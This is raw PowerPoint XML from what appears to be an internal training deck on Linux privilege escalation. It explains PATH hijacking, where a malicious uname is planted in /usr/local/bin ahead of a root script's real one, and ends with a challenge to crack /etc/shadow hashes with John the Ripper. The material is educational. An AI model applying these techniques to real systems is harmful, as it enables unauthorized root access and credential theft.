              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{687B0253-E21C-0B4C-919C-9324CBC903C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4707772" y="1566641"/>
            <a:ext cx="6630231" cy="4497729"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The Path</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>/local/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>sbin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>:/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>/local/bin:/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>sbin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/bin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>:/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>sbin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>:/bin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> # which </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>uname</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>uname</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1177416605"/>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C470D6AE-151F-B24B-A53D-13D6C536ABB3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="642258" y="634946"/>
            <a:ext cx="3869339" cy="946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3600"/>
              <a:t>Privilege Escalation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{687B0253-E21C-0B4C-919C-9324CBC903C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4707772" y="1566641"/>
            <a:ext cx="6630231" cy="4497729"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The Path</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>/local/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>sbin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>:/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>/local/bin:/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>sbin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/bin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>:/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>sbin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>:/bin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> # which </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>uname</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>uname</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Path Jacking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>There is a script, ran by root, that calls </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>uname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2690841467"/>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C470D6AE-151F-B24B-A53D-13D6C536ABB3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="642258" y="634946"/>
            <a:ext cx="3869339" cy="946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3600"/>
              <a:t>Privilege Escalation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{687B0253-E21C-0B4C-919C-9324CBC903C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4707772" y="1566642"/>
            <a:ext cx="6630231" cy="3732946"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The Path</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>/local/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>sbin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>:/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>/local/bin:/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>sbin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/bin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>:/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>sbin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>:/bin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> # which </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>uname</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>uname</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Path Jacking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>There is a script, ran by root, that calls </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>uname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Hacker: “I’m going to write a different </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>uname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> and put it sooner in the path” </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>(Places malicious </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>uname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> in /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>/local/bin)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="95769689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71AD3-2C2E-D34C-8C32-87B266CADE4E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="642259" y="634946"/>
            <a:ext cx="3372529" cy="5055904"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>The Process</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="31" name="Straight Connector 3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7" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{026A0CE3-EF81-46F4-BB0E-DB7DD7741FDE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1879575113"/>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7169216"/>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F0E7D431-662C-45F5-8EB0-C5691AFEC6D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="481246" y="1662191"/>
          <a:ext cx="3372529" cy="4186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C470D6AE-151F-B24B-A53D-13D6C536ABB3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="642258" y="634946"/>
            <a:ext cx="3869339" cy="946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r>
              <a:rPr lang="en-US" sz="3600"/>
              <a:t>Privilege Escalation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{687B0253-E21C-0B4C-919C-9324CBC903C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4707772" y="1566642"/>
            <a:ext cx="6630231" cy="4834158"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The Path</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>/local/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>sbin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/local/bin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>:/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>sbin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/bin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>:/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>sbin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>:/bin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> # which </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>uname</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>uname</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Path Jacking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>There is a script, ran by root, that calls </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>uname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Hacker: “I’m going to write a different </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>uname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> and put it sooner in the path” </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>(Places malicious </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>uname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> in /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>/local/bin)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t># which </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>uname</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>/local/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>uname</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="364267118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D9A2-A268-5446-B7EB-6EDA74A613CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Lunch Time Challenge!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{345581C7-CC13-5846-85BE-AF30E808C03E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>Win a sticker!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Instructions:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>In slack, I will post 2 files:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>	/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>/passwd</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>	/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>/shadow</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Using some Google-foo and a tool called John The Ripper, you’ll crack the password hash and reveal the plain-text password.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> Ping on slack when you have cracked the password (don’t post the password).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
